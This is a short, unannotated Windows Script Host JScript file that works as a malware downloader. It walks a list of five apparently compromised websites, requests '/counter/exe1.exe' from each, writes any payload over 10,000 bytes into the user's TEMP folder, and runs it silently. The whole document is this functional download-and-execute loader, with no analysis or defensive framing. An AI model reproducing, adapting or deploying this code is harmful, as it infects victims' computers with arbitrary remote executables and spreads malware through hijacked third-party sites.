var ld = 0;
var ll = ["freeartsnyc.org/wp-content/uploads/2017/03/", "eduartfun.pl/libraries/cms/schema", "lluisallullevents.com/wp-content/uploads/2017/03/", "paginaprueba.dreamhosters.com/counter/counter/counter", "bollenpc.be/new/administrator/components/com_menus"];
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92);
var xo = WScript.CreateObject("Msxml2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
for (var i = ld; i < ll.length; i++) {
    var dn = 0;
    try {
        xo.open("GET", "http://" + ll[i] + "/counter/exe1.exe", false);
        xo.send();
        if (xo.status == 200) {
            xa.open();
            xa.type = 1;
            xa.write(xo.responseBody);
            if (xa.size > 10000) {
                dn = 1;
                xa.saveToFile(fn + "exe1.exe", 2);
                try {
                    ws.Run(fn + "exe1.exe", 1, 0);
                } catch (er) {};
            };
            xa.close();
        };
        if (dn == 1) {
            ld = i;
            break;
        };
    } catch (er) {};
};
